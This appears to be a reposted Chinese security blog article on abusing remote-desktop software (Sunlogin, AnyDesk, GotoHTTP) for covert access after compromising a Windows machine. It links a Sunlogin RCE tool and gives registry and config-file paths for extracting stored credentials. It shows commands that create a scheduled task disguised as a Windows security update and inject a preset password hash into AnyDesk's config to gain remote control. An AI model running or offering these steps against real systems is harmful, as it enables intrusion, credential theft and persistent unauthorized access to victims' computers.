现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
0x00 前言
0x01 向日葵
向日葵个人版for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)
测试客户端漏洞版本:11.0.0.33162
攻击过程:
tasklist查看是否有sunlogin的进程
直接用golang的工具来进行攻击即可
https://github.com/Mr-xn/sunlogin_rce
向日葵(不可以攻击)
reg query HKEY\\\_USERS\\\\.DEFAULT\\\\Software\\\\Oray\\\\SunLogin\\\\SunloginClient\\\\SunloginInfo
reg query HKEY\\\_USERS\\\\.DEFAULT\\\\Software\\\\Oray\\\\SunLogin\\\\SunloginClient\\\\SunloginGreenInfo
向日葵默认配置文件路径:
安装版:C:\\\\Program Files\\\\Oray\\\\SunLogin\\\\SunloginClient\\\\config.ini
便携版:C:\\\\ProgramData\\\\Oray\\\\SunloginClient\\\\config.ini
本机验证码参数:encry\\\_pwd
本机识别码参数:fastcode(去掉开头字母)
sunlogincode:判断用户是否登录状态
在向日葵高于12.5.3.*的已经没有办法获取secert了
0x02 todesk
0x03 anydesk
anydesk的配置文件在以下文件中,而通常这个时候我们有权限修改anydesk的配置文件。
C:\\Users\\用户名\\AppData\\Roaming\\AnyDesk
攻击机ip: 10.211.55.3 + 10.211.55.2
受害机ip: 10.211.55.4(windows defender全开)
情景复现1
这里拿到了受害机的webshell,是个普通权限,无法去关闭
情景复现2(计划任务)
powershell "(((Get-WmiObject -Class Win32\_Process -Filter 'Name=\\"explorer.exe\\"').GetOwner().user) -split '\\n')\[0\]
schtasks /Create /TN Windows\_Security\_Update /SC monthly /tr "C:\\Users\\testuser.G1TS\\Desktop\\anydesk.exe" /RU 用户名
执行计划任务
schtasks /run /tn Windows\_Security\_Update
后续步骤和上面相同
然后添加密码到配置文件中去即可。
echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c C:\Users\用户目录\AppData\Roaming\AnyDesk\service.conf
echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a C:\Users\用户目录\AppData\Roaming\AnyDesk\service.conf
然后查看用户的id
type C:\Users\用户名\AppData\Roaming\AnyDesk\system.conf
连接即可
(2) 启动anydesk的权限需要桌面用户权限,比如,IIS做了中间件环境,拿到的webshell一般都是没有桌面用户权限,如果启动anydesk是不会成功的。
0x04 gotohttp
复现过程
https://gotohttp.com/
因为是普通用户启动的,这里如果尝试关闭windows defender,是无法进行点击的。
0x05 参考
文章来源:奇安信攻防社区(Q16G)
原文地址:https://forum.butian.net/share/2310
关注我们
还在等什么?赶紧点击下方名片开始学习吧!
信 安 考 证
CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001... |
推 荐 阅 读
文章引用微信公众号"潇湘信安",如有侵权,请联系管理员删除!